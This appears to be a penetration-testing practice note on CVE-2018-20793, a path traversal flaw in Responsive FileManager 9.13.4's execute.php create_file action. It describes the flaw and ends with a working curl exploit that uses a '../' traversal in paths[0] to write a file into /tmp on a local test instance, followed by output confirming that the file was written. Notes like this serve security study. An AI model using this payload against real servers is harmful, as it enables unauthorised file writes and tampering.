CVE-2018-20793
/Practice/Apex/3-Exploitation/attachments/{7069F6B7-2EBE-4951-A661-7DD84EC13A69}.png)
A vulnerability has been found in Tecrail Responsive FileManager 9.13.4 and classified as critical. Affected by this vulnerability is the function create_file of the file execute.php. The manipulation of the argument paths[0] with an unknown input leads to a path traversal vulnerability. The CWE definition for the vulnerability is CWE-22. The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. As an impact it is known to affect integrity, and availability.
Exploit
$ curl -X POST -d "paths[0]=../../../../../../../../tmp/&names[0]=hacked.txt&new_content=Hacked" -H "Cookie: PHPSESSID=12k93hcuj6b7qt2jmnn40rd612" "http://localhost:1111/filemanager/execute.php?action=create_file"
$ ls /tmp
hacked.txt